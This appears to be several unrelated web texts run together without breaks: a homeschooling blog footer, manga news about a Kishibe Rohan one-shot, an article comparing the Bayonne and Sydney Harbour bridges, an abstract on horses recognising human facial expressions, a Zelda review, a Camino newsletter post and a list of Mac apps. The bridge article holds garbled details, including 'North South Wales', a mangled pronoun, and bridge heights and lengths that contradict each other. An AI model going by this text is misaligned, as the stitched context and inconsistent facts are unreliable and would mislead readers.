What were your thoughts on homeschooling special needs kids? I would love to hear your stories. And as always, all advice is welcomed! Please comment below or drop me an email.
Sharing is Caring! Tweet
Email
Like this: Like Loading...
The August issue of Shueisha 's Bessatsu Margaret magazine is revealing on Thursday that Hirohiko Araki will publish a new installment of their Kishibe Rohan wa Ugokanai ( Thus Spoke Kishibe Rohan ) manga in the magazine's next issue in August. The ninth installment in the one-shot manga series is titled "DNA."
Kishibe Rohan wa Ugokanai is a series of one-shots starring the JoJo's Bizarre Adventure: Diamond Is Unbreakable character Rohan Kishibe, who is also Araki's fictional alter ego. Shueisha published a compiled book volume of the different Kishibe Rohan wa Ugokanai stories in November 2013. Shueisha 's Jump Square magazine published the most recent one-shot, "Episode #07 Getsuyōbi - Tenkiame" (Monday - Sun Shower), in December 2015.
The manga is getting an original anime DVD ( OAD ) adaptation. The OAD will be distributed to customers who buy all 13 DVD or Blu-ray Disc volumes of the JoJo's Bizarre Adventure: Diamond Is Unbreakable anime. The 13th and final DVD and Blu-ray Disc volume of the anime shipped on June 28. The anime's cast includes Takahiro Sakurai as Rohan Kishibe, Mai Nakahara as Kyōka Izumi, and Kaori Mizuhashi as Ikkyū.
The 39-episode JoJo's Bizarre Adventure: Diamond Is Unbreakable anime premiered in April 2016, and Crunchyroll and Viz Media streamed the series as it aired in Japan.
Raymond Bucko for Flickr Creative Commons / Daniel Munoz for Getty Images
The Sydney Harbour Bridge in Sydney, Australia, is one of the most famous structures of its kind. Tourists flock to it like selfie-taking moths to a flame, and suit up to climb over it day in and day out.
But did you know it has a twin in Bayonne, New Jersey, that most people don't even think twice about?
Bayonne is located at the end of the peninsula where you will find Hoboken and Jersey City. It's just south of both of those. The Bayonne Bridge links the city of its name with Staten Island, New York. It's almost identical to the Sydney Harbour Bridge, except that the Sydney bridge has concrete pylons on either side and the Bayonne Bridge doesn't.
The Sydney Harbour Bridge during a fireworks show. Don't hold your breath for a similar showing in Bayonne. Getty Images
It turns out the Sydney Harbour Bridge and the Bayonne Bridge are considered "sister bridges," and officials from Sydney and Bayonne attended each other's ribbon-cutting ceremonies for the identical bridges back in the 1930s.
Well, they're considered sister bridges by the Port Authority of New York and New Jersey and Staten Island news site SILive, at least. For some reason, no Sydney-centric websites appear to be playing up the similarities.
SydneyHarbourBridge.info doesn't seem to know about Bayonne, for example. And the Sydney Harbour Bridge look-alikes page on the Sydney for Everyone website fails to mention the aesthetic similarities between the two bridges.
The Bayonne Bridge, as viewed from Staten Island. Flickr Creative Commons/vaticanus
The Bayonne bridge opened to traffic first, on November 15, 1931, but construction on the Sydney Harbour Bridge began first, according to Wikipedia. The Bayonne Bridge carries four lanes of Route 440 from Bayonne to Staten Island.
It's a steel-arch bridge whose total length is 5,780 feet, Wikipedia says. Its width is 85 feet. It's longer than the Sydney bridge, but shorter, with 325 feet from the arch to the water.
The Sydney Harbour Bridge is actually shorter in length at 3,770 feet, according to Wikipedia, but wider at 161 feet across. It's 440 feet tall, so although it's shorter than the Bayonne Bridge, it reaches about 115 feet higher.
The Bayonne Bridge crosses a body of water known as the Kill Van Kull. The Sydney Harbour Bridge crosses a body of water called Port Jackson.
The Bayonne Bridge's surroundings look desolate compared to those in Sydney. Flickr Creative Commons/Raymond Bucko
The Sydney Harbour Bridge was designed by an English firm called Dorman Long and Co of Middlesbrough, according to an Australian government website. Construction began in 1924 and took 1,400 men eight years to build, using 53,000 tons of steel. The bridge carries eight traffic lanes and two rail lines. It was open to the public on March 19, 1932.
Construction started later on the Bayonne Bridge, commencing in September 1928, according to the Port Authority's website. But it was completed and open to the public first, in November 1931. The Bayonne Bridge was the product of collaboration between designer Othmar H. Ammann and architect Cass Gilbert.
The Bayonne Bridge held the record as the world's longest steel-arch bridge until 1977, when the New River Gorge Bridge in West Virginia topped it at 1,700 feet long. But according to one Australian news source, many Australian children are taught that the Sydney Harbour Bridge is the longest of its kind in the world.
The Sydney Harbour Bridge is located near the iconic opera house. Getty Images
The Sydney Harbour Bridge was opened on March 19, 1932, according to Wikipedia. Officials from Sydney and Bayonne attended each other's bridge-opening ceremonies.
The Bayonne bridge-opening and ribbon-cutting ceremony went forward without incident, but Australia's ribbon cutting didn't go as well. The ceremony and show of cultural friendship was upstaged in Australia by a monarchist.
North South Wales Premier Jack Lang was interrupted from cutting the ribbon by Captain Francis de Groot, a pro-monarchist who was offended that the bridge wasn't being opened by a member of the British Royal Family, according to Australian Geographic. They slashed the ribbon open with theirs sword.
If you zoom in far enough on your camera from Battery Park in New York City, you can see the Statue of Liberty with the Bayonne Bridge in the background. Flickr Creative Commons/Kiah Ankoor
The ribbon was tied back together, and De Groot was arrested and fined five pounds, according to AG. Lang was then able to cut it himself. It might be because of De Groot's flamboyant show of loyalism that the presence of the Jersey contingent at that bridge's opening has been all but lost in Australia's version of events.
That wasn't the last time the Bayonne Bridge would be upstaged. An analysis of the Bayonne Bridge published by University of Bath undergrad RJ Pelly in 2009 notes that the bridge never received the same level of fame as the Sydney Harbour Bridge. Pelly posits that this was because it was "generally overshadowed by the completion of another of Ammann's creations; the longer and taller George Washington Bridge, which opened less than a month later."
The better-known George Washington Bridge connects Fort Lee, New Jersey, with Manhattan's Washington Heights. Getty Images
The Bayonne Bridge was still admired by those in the know, though.
"Although it may have failed to stand out in the public eye against the surrounding New York monuments," Pelly continues, "the bridge was immediately recognized among academic circles as a work of structural art, and awarded the 'most beautiful steel bridge' prize by the American Institute of Steel Construction in the year of its completion."
The Bayonne Bridge also offers something that most other bridges of its size do not: sidewalks for pedestrians. It's the only major bridge in Staten Island that allows use of its walkway, according to SILive.com, although Wikipedia says the walkway will be closed until about 2017 while the bridge is lifted.
What Bayonne doesn't have, though, are the stairways going over the bridge, found on its twin in Sydney and in many a vacation photo.
Australian Football League coaches pose for a photo while crossing the bridge. Getty Images
The Sydney Harbour Bridge also has concrete pylons on either side of the arch, which were included, according to Wikipedia, only to "allay public concern about the structural integrity of the bridge." They now house CCTV cameras, venting chimneys, and truck and vehicle storage.
Although these bridges appear to be so similar, only one looms large in the culture identity of its home city. Blogger Dominic Ambrose puts it this way:
"The Sydney Harbour Bridge is centrally located, a major artery and a major conduit for the economy of that city. It is a symbol of the city and valued enough to be well maintained and kept in the public spotlight. The Bayonne Bridge, on the other hand, is almost unknown to most New Yorkers and New Jerseyans. Connecting two perennially depressed areas, it has never really reached its potential (a second roadway, though planned, was never deemed necessary) and it has slipped into the shadows, rusting away at the periphery of New York Harbor."
Whether non-human animals can recognize human signals, including emotions, has both scientific and applied importance, and is particularly relevant for domesticated species. This study presents the first evidence of horses' abilities to spontaneously discriminate between positive (happy) and negative (angry) human facial expressions in photographs. Our results showed that the angry faces induced responses indicative of a functional understanding of the stimuli: horses displayed a left-gaze bias (a lateralization generally associated with stimuli perceived as negative) and a quicker increase in heart rate (HR) towards these photographs. Such lateralized responses towards human emotion have previously only been documented in dogs, and effects of facial expressions on HR have not been shown in any heterospecific studies. Alongside the insights that these findings provide into interspecific communication, they raise interesting questions about the generality and adaptiveness of emotional expression and perception across species.
The Legend of Zelda: A Link Between Worlds is one hell of a risk.
More than two decades after The Legend of Zelda: A Link to the Past was widely regarded as one of the greatest games of all time, Nintendo is doing the unthinkable with a direct sequel. There are no nebulous allusions to hidden timelines. There are no cute winks or nods or maybes. The Legend of Zelda: A Link Between Worlds takes on all the expectations and danger of direct acknowledgement of its predecessor.
But A Link Between Worlds takes the fundamentals of the series' 16-bit era and flips its design conceits on their head. Nintendo has taken its most sacred cow and pushed it out into a more open world with all the terrifying freedom the series has never had.
The result? The best Zelda game of the last twenty years.
A Link Between Worlds is set in the same Hyrule as A Link to the Past. Sure, it's a few generations later, but for fans of the series — which, let's be clear, should be you — everything will be right where you left it. It follows the adventures of a new Link, a new hero of Hyrule. Pulled into a strange conspiracy involving a villain who turns their victims into paintings and spirits them away to a dark shadow world called Lorule, Link is saved by a mysterious magic bracelet. This grants Link a special gift: the ability to transform into a painting themselves and move along walls in 2D.
But here's the thing: before going two-dimensional, A Link Between Worlds re-establishes the series' former tropes and mechanics as quickly as possible. There are no five-hour tutorial phases, no hand-holding. You go from waking up in your bed to swinging a sword in all of five minutes. This new Zelda doesn't waste any time getting you to play it. And it plays incredibly well.
I was happy to see an article that I wrote was published in the quarterly newsletter for American Pilgrims on the Camino. Page 17 of the March 2016 La Concha features Camino love stories and photos of three of the couples who wrote guest posts.
So why was my head in the clouds last month? I know it sounds cheesy, but it all comes down to this: I LOVE love! There are those who embrace it, those who chase it and those who deny its power. When I meet a nice couple, I like to ask them how they met. Over the last year, I've enjoyed hearing stories of people's experience on the Camino. My curiosity of both topics combined revealed a deeper aspect of the Camino. I figured if I'm fascinated with this phenomenon, perhaps others are too. Plus, we could use a little more love in our world.
See the love stories at caminoprovides.com/love/
Download La Concha March 2016 (PDF)
Share the love! ♥
PS. I'm not the only talking about Camino romance. Take a listen to the CaminoWays podcast, Most Romantic Camino Spots. Maria delivers a list of top romantic spots on the different Camino routes in Spain, Portugal and France.
Listen to CaminoWays podcasts for iTunes and Android
In today's post you will find 15 incredibly useful Mac Apps for freelance web designers to get their website or application styled in a fraction of the time it took before and help them manage their project efficiently to get their job done.
Don't Forget to…
subscribe to our RSS-Feed and visit my twitter page : nourayehia get notified when our next post is here.
Extremely powerful web development tool, created by the minds behind CSSEdit. Providing a powerful editing, sleek projects, live preview, real publishing and synchronization tools.
Espresso features an immensely powerful rule-based syntax engine, CoreSyntax, that transforms your text documents into semantic structure. Espresso has an extensible Navigator that's best compared to the CSSEdit styles list.
CSSEdit's unique focus is on style sheets, it offers a wide range of features for any level of expertise. Starting out? Selector Builder, advanced visual editors, Live Preview, intelligent source environment and a powerful X-Ray web page inspector for an unbeatable CSS debugging suite.
Pixelmator, the beautifully designed, easy-to-use, fast and powerful image editor for Mac OS X has everything you need to create, edit and enhance your images. Pixelmator is a layer-based image editor. You can quickly create layers from your photos, other pictures, from selections or even your iSight. Pixelmator can add a layer to your composition directly from your Mac's little camera. With Pixelmator's powerful, pixel-accurate collection of selection tools you can quickly and easily select any part of your images to edit and apply special effects to portions of your pictures.
Panic Coda is a great all-in-one Web development environment tool, keeping many of your commonly used tools in separate tabs. Tools include: text-editor, css editor, file transfer, svn, terminal & smart Spelling. All of the usual languages are supported and styled appropriately including: CSS, HTML, Javascript, Java, Perl, PHP, Python, Ruby, SQL, XML, and straight text.
Lineform is an ideal Mac app for vector art, diagrams and illustrations. Lineform has all of the most popular tools, including everything from freeform gradients to compositing effects, enabling you to create the designs you want without getting in your way with superfluous “features” you don't need.
Fontcase is a font management application that provides an elegant and powerful workflow to help you organise the fonts you have installed on your system. Designed to be an iTunes for your fonts, Fontcase has a powerful tagging system, which is designed to let you control your fonts like you control your music.
Deep calculates the range of colors used in each of your images by analyzing the pixels and calculating the most popular colors. This is what makes the palettes in Deep powerful, you can find images that have similar colors, which is great when you are looking for the perfect picture to go on your web site. In fact, just drag any image on to Deep and it will find and rank all the images on your computer that are similar.
Cyberduck is an open source FTP, SFTP, WebDAV, Mosso Cloud Files and Amazon S3 browser for the Mac. It features an easy-to-use interface with quickly accessible bookmarks.
Flow is another file transfer coming in style. Flow brings the best of the Mac to your server's files and folders. Put simply, Flow makes working remotely every bit as intuitive and natural as working locally with the Finder. With Flow, you can edit files directly on your server, connect to (FTP, SFTP, Amazon S3, WebDAV, and MobileMe iDisk servers), Quickly Upload Without UI and many other features.
Sequel Pro is a Mac OS X MySQL Database Management app. Sequel Pro gives you direct access to your MySQL databases on local and remote servers with support for importing and exporting data from popular files including SQL, CSV and XML.
Task management has never been this easy. Organize your to-dos with Projects and Areas of Responsibility. Features include: A smart Today list automatically gathers all you need to look at, Repeating To-Dos, Every list can easily be filtered and sorted by due date, iPhone Sync and many other features.
xScope is a powerful set of tools that are ideal for measuring, aligning and inspecting on-screen graphics and layouts. Quickly available via the Mac OS X menu bar, xScope's flexible tools float above desktop windows and UI elements making measuring a breeze.
KeyCue gives you an instant overview of the overall functionality of any application, plus lets you automatically start working more efficiently by making use of menu shortcuts.
TextExpander saves you countless keystrokes with customized abbreviations for your frequently-used text strings, code snippets and images.
On The Job has a lot of power under the hood but maintains it's reputation as the easiest to use time and expense tracking solution available for Mac OS X. On The Job offers flexible invoice creation. Create invoices for specific date ranges, covering a single job, or spanning multiple jobs.
Other Mac Apps you will find interesting
Let us know your favorite Mac App and why do you find it useful and may be can't live without it :)
